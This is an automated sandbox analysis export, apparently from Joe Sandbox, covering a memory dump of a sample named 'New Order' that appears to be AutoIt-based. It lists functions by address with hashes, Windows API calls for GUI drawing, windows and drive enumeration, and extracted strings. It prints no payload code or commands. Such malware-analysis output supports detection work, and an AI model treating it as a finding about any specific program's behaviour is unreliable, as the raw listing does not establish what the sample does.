Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50f0fcbc1e6e2d1dbd043553e401169d0c6ea40614d78342c7d7b770f8377f64
Instruction ID: 2643bfa074b6f18cf3945b0bb1131301270c33bd2c260faeb339c347fe632643
Opcode Fuzzy Hash: 50f0fcbc1e6e2d1dbd043553e401169d0c6ea40614d78342c7d7b770f8377f64
Instruction Fuzzy Hash: A6618C702F87CB56DE345D2B48557BE3398DF41708FE0092EE886CB381D5519E728725

Function 002E7CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca0b6286cbbb45247ec8369915564b3b6b651990c9d9c4529bfa93d4f50545f7
Instruction ID: 45d5cd9615f4a6e844347263ba5b12a321265006769c96ca5c3d8a58db75903c
Opcode Fuzzy Hash: ca0b6286cbbb45247ec8369915564b3b6b651990c9d9c4529bfa93d4f50545f7
Instruction Fuzzy Hash: 13619D712F87CB52DE384D2B4C95BBF2389DF42700FD40959E986CB281E7619D728715

Function 002E1706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 5b7d6c90af82651722a5166a6ef51481effe07e8c5d87544d5003eb65166005a
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 788186726680E349EB2D8A3B857447EFFE15A923A135A07BDD4F2CA1C1EE348574D620

Function 00313CD5 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d259450ff8ba41e7860adfa2612c9ec68484f953caa6e09b324e07a3c8f899a7
Instruction ID: c6ed534fb61aa8c48059de815bea543e26262d3d4921dc4f036c4e847cc79fa2
Opcode Fuzzy Hash: d259450ff8ba41e7860adfa2612c9ec68484f953caa6e09b324e07a3c8f899a7
Instruction Fuzzy Hash: C161C7B68093C09FCB1BCF348094695BFF1EF1B31475A44EEC5868B561E2719D96CB01

Function 002DD065 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 266aaee7b50497f23c654f721997795d51e841222f639f2af9bcb668818c96eb
Instruction ID: 62c18d15244cd4e7bca94811d56b0ab96e2dfe7bcf1acc7d4a1221196eac16dd
Opcode Fuzzy Hash: 266aaee7b50497f23c654f721997795d51e841222f639f2af9bcb668818c96eb
Instruction Fuzzy Hash: 77514F7254EBC2DFC3175B348C6A1857F70EE1724832A49EFC4828E4B3E666041ACF56

Function 002CD010 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a012d645e08292c3acb152791c4fc72978c0067702c55bd48900f86d45000e
Instruction ID: 272e486873a2b201de579073a675be7a445a1178494c5c98a4a5382bee093423
Opcode Fuzzy Hash: a1a012d645e08292c3acb152791c4fc72978c0067702c55bd48900f86d45000e
Instruction Fuzzy Hash: 6F419D70A002059FCB59CF68C581AEDBBF6FF4A310F2185A9E909DB641D731ED92CB50

Function 002C90BC Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de87ba3b17471714e02199e3046e501b0dbc3f9d8813496a496b173d345969a1
Instruction ID: 062e557d144f4fa1a16f70decfe59186c5c267bec8d1a90c31332f1066dd050a
Opcode Fuzzy Hash: de87ba3b17471714e02199e3046e501b0dbc3f9d8813496a496b173d345969a1
Instruction Fuzzy Hash: 0731026A52E2C44AC7035B389CAA6E27F75DE5721874D5ACFD0C18E467C105598BCB23

Function 003570D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0035712F
GetSysColorBrush.USER32(0000000F), ref: 00357160
GetSysColor.USER32(0000000F), ref: 0035716C
SetBkColor.GDI32(?,000000FF), ref: 00357186
SelectObject.GDI32(?,?), ref: 00357195
InflateRect.USER32(?,000000FF,000000FF), ref: 003571C0
GetSysColor.USER32(00000010), ref: 003571C8
CreateSolidBrush.GDI32(00000000), ref: 003571CF
FrameRect.USER32(?,?,00000000), ref: 003571DE
DeleteObject.GDI32(00000000), ref: 003571E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00357230
FillRect.USER32(?,?,?), ref: 00357262
GetWindowLongW.USER32(?,000000F0), ref: 00357284

Part of subcall function 003573E8: GetSysColor.USER32(00000012), ref: 00357421
Part of subcall function 003573E8: SetTextColor.GDI32(?,?), ref: 00357425
Part of subcall function 003573E8: GetSysColorBrush.USER32(0000000F), ref: 0035743B
Part of subcall function 003573E8: GetSysColor.USER32(0000000F), ref: 00357446
Part of subcall function 003573E8: GetSysColor.USER32(00000011), ref: 00357463
Part of subcall function 003573E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00357471
Part of subcall function 003573E8: SelectObject.GDI32(?,00000000), ref: 00357482
Part of subcall function 003573E8: SetBkColor.GDI32(?,00000000), ref: 0035748B
Part of subcall function 003573E8: SelectObject.GDI32(?,?), ref: 00357498
Part of subcall function 003573E8: InflateRect.USER32(?,000000FF,000000FF), ref: 003574B7
Part of subcall function 003573E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003574CE
Part of subcall function 003573E8: GetWindowLongW.USER32(00000000,000000F0), ref: 003574DB

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: bb570e3c61ac6161259633db10e735c08fa7617f458718253fe2abf97f8bf1e7
Instruction ID: f344f174bfc6e18c9a4aa38ca0fe669c5f1707b65e5dcba995aed3d915b9c3ee
Opcode Fuzzy Hash: bb570e3c61ac6161259633db10e735c08fa7617f458718253fe2abf97f8bf1e7
Instruction Fuzzy Hash: 1CA19F72018701AFDB029F60DC48E6BBBADFB49326F101A19F9A2961F1D771E944CB91

Function 002D8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 002D8E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00316AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00316AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00316F43

Part of subcall function 002D8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002D8BE8,?,00000000,?,?,?,?,002D8BBA,00000000,?), ref: 002D8FC5

SendMessageW.USER32(?,00001053), ref: 00316F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00316F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00316FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00316FB7

Strings

0, xrefs: 00316DCF

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 55450f8589715f663446ed4737396d9211b246dfc7967c187b9d8f941007fb42
Instruction ID: e41c09ac03ae6e0e9950ae55138cb710cbcba7fa88bea3cd48c9386c95d11d30
Opcode Fuzzy Hash: 55450f8589715f663446ed4737396d9211b246dfc7967c187b9d8f941007fb42
Instruction Fuzzy Hash: A712AD30214202DFDB2BCF54D855BAAB7E9FB49304F15456AF4859B261CB32ECA2CF91

Function 00342711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0034273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0034286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 003428A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 003428B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00342900
GetClientRect.USER32(00000000,?), ref: 0034290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00342955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00342964
GetStockObject.GDI32(00000011), ref: 00342974
SelectObject.GDI32(00000000,00000000), ref: 00342978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00342988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00342991
DeleteDC.GDI32(00000000), ref: 0034299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003429C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 003429DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00342A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00342A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00342A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00342A77
GetStockObject.GDI32(00000011), ref: 00342A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00342A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00342A97

Strings

msctls_progress32, xrefs: 00342A13
static, xrefs: 0034294F, 00342A71
AutoIt v3, xrefs: 003428F8
DISPLAY, xrefs: 0034295A

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 1ad47709e36f661b710f52be556d01948f7494d0abe8fbee1fb8be1417e2ece9
Instruction ID: ebdc313fe6b818f688790452955ed28c4673e56ff17b25b2ecbf63302735b420
Opcode Fuzzy Hash: 1ad47709e36f661b710f52be556d01948f7494d0abe8fbee1fb8be1417e2ece9
Instruction Fuzzy Hash: EAB13B75A10215AFEB15DF68CC8AFAE7BB9EB08715F004219F915EB2A1D770AD40CF90

Function 00334ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00334AED
GetDriveTypeW.KERNEL32(?,0035CB68,?,\\.\,0035CC08), ref: 00334BCA
SetErrorMode.KERNEL32(00000000,0035CB68,?,\\.\,0035CC08), ref: 00334D36

Strings

\\.\, xrefs: 00334B3F
Removable, xrefs: 00334C10, 00334C15
iSCSI, xrefs: 00334CC2
Virtual, xrefs: 00334CE5
Network, xrefs: 00334C02
ATAPI, xrefs: 00334C91
CDROM, xrefs: 00334BFB
Fibre, xrefs: 00334CAD
SATA, xrefs: 00334CD0
ATA, xrefs: 00334C98
Unknown, xrefs: 00334BED, 00334C83
MMC, xrefs: 00334CDE
1394, xrefs: 00334C9F
SCSI, xrefs: 00334C8A
PhysicalDrive, xrefs: 00334B76
RAMDisk, xrefs: 00334BF4
FileBackedVirtual, xrefs: 00334CEC
RAID, xrefs: 00334CBB
SAS, xrefs: 00334CC9
SSA, xrefs: 00334CA6
Fixed, xrefs: 00334C09
USB, xrefs: 00334CB4
SSD, xrefs: 00334C4A

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 1ab3edd5cecc54a62ee700ee0fd67ad742c716f2db055dacb540d00021ebfd6d
Instruction ID: b4b8444fc99b9b0cfe94beeeef3c81e54783c4adc8d5be64ade515db0915c61e
Opcode Fuzzy Hash: 1ab3edd5cecc54a62ee700ee0fd67ad742c716f2db055dacb540d00021ebfd6d
Instruction Fuzzy Hash: 5261C230605305ABCB07EF24CAC2EACB7B4EB04744F209699F806ABA56DB35FD45DB41

Function 003573E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00357421
SetTextColor.GDI32(?,?), ref: 00357425
GetSysColorBrush.USER32(0000000F), ref: 0035743B
GetSysColor.USER32(0000000F), ref: 00357446
CreateSolidBrush.GDI32(?), ref: 0035744B
GetSysColor.USER32(00000011), ref: 00357463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00357471
SelectObject.GDI32(?,00000000), ref: 00357482
SetBkColor.GDI32(?,00000000), ref: 0035748B
SelectObject.GDI32(?,?), ref: 00357498
InflateRect.USER32(?,000000FF,000000FF), ref: 003574B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003574CE
GetWindowLongW.USER32(00000000,000000F0), ref: 003574DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0035752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00357554
InflateRect.USER32(?,000000FD,000000FD), ref: 00357572
DrawFocusRect.USER32(?,?), ref: 0035757D
GetSysColor.USER32(00000011), ref: 0035758E
SetTextColor.GDI32(?,00000000), ref: 00357596
DrawTextW.USER32(?,003570F5,000000FF,?,00000000), ref: 003575A8
SelectObject.GDI32(?,?), ref: 003575BF
DeleteObject.GDI32(?), ref: 003575CA
SelectObject.GDI32(?,?), ref: 003575D0
DeleteObject.GDI32(?), ref: 003575D5
SetTextColor.GDI32(?,?), ref: 003575DB
SetBkColor.GDI32(?,?), ref: 003575E5

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: f50f6ebcb383388d951a3fb5a7620e1f6a582c8e8a770777904c801d1f547a66
Instruction ID: 66e4a708c132751626d1efc37ca996e6ac5595dde63cd7479a2f9b9852f5185f
Opcode Fuzzy Hash: f50f6ebcb383388d951a3fb5a7620e1f6a582c8e8a770777904c801d1f547a66
Instruction Fuzzy Hash: AC617B72900318AFDF029FA5DC49EAEBFB9EB09322F115515F915AB2B1D7709A40CF90

Function 00350FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00351128
GetDesktopWindow.USER32 ref: 0035113D
GetWindowRect.USER32(00000000), ref: 00351144
GetWindowLongW.USER32(?,000000F0), ref: 00351199
DestroyWindow.USER32(?), ref: 003511B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003511ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0035120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0035121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00351232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00351245
IsWindowVisible.USER32(00000000), ref: 003512A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 003512BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 003512D0
GetWindowRect.USER32(00000000,?), ref: 003512E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0035130E
GetMonitorInfoW.USER32(00000000,?), ref: 00351328
CopyRect.USER32(?,?), ref: 0035133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 003513AA

Strings

tooltips_class32, xrefs: 003511E6
0, xrefs: 003510D3
(, xrefs: 0035131B

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 221d6c9eb9742abd58752365ace652ec2b51836a6c1fef6e21f6106a7b1ec1e3
Instruction ID: 551864eb959ac581777bde9ade9f4a1a4ad6797d1480e98d3f024692d583c592
Opcode Fuzzy Hash: 221d6c9eb9742abd58752365ace652ec2b51836a6c1fef6e21f6106a7b1ec1e3
Instruction Fuzzy Hash: 35B17971614341AFD701DF64C885F6ABBE8EF88355F008A1CF9999B2A1C771E948CF91

Function 00350241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 003502E5
_wcslen.LIBCMT ref: 0035031F
_wcslen.LIBCMT ref: 00350389
_wcslen.LIBCMT ref: 003503F1
_wcslen.LIBCMT ref: 00350475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 003504C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00350504

Part of subcall function 002DF9F2: _wcslen.LIBCMT ref: 002DF9FD

Part of subcall function 0032223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00322258
Part of subcall function 0032223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0032228A

Strings

GETSELECTEDCOUNT, xrefs: 00350470, 0035048B
SELECTCLEAR, xrefs: 0035052D
FINDITEM, xrefs: 00350627
VIEWCHANGE, xrefs: 00350675
SELECT, xrefs: 00350548
GETTEXT, xrefs: 003503EC, 00350407
SELECTINVERT, xrefs: 0035057E
SELECTALL, xrefs: 00350515
DESELECT, xrefs: 0035059C
GETSELECTED, xrefs: 003505E1
GETSUBITEMCOUNT, xrefs: 00350384, 0035039F
ISSELECTED, xrefs: 003504DD
GETITEMCOUNT, xrefs: 00350316, 00350337

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 10a72ea8246506f0ab799e67fbe03691f716075acdacae67205d57731f927ed2
Instruction ID: b4d34e9f8b3fa047d921d06269229731c5e9858beba4f1352428a7140cc645cd
Opcode Fuzzy Hash: 10a72ea8246506f0ab799e67fbe03691f716075acdacae67205d57731f927ed2
Instruction Fuzzy Hash: D9E1BD312183008FC71AEF24C551D2AB3E6BF88315F554A5DF896AB7A1DB31ED49CB81

Function 002D8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002D8968
GetSystemMetrics.USER32(00000007), ref: 002D8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002D899B
GetSystemMetrics.USER32(00000008), ref: 002D89A3
GetSystemMetrics.USER32(00000004), ref: 002D89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 002D89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 002D89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 002D8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 002D8A3C
GetClientRect.USER32(00000000,000000FF), ref: 002D8A5A
GetStockObject.GDI32(00000011), ref: 002D8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 002D8A81

Part of subcall function 002D912D: GetCursorPos.USER32(?), ref: 002D9141
Part of subcall function 002D912D: ScreenToClient.USER32(00000000,?), ref: 002D915E
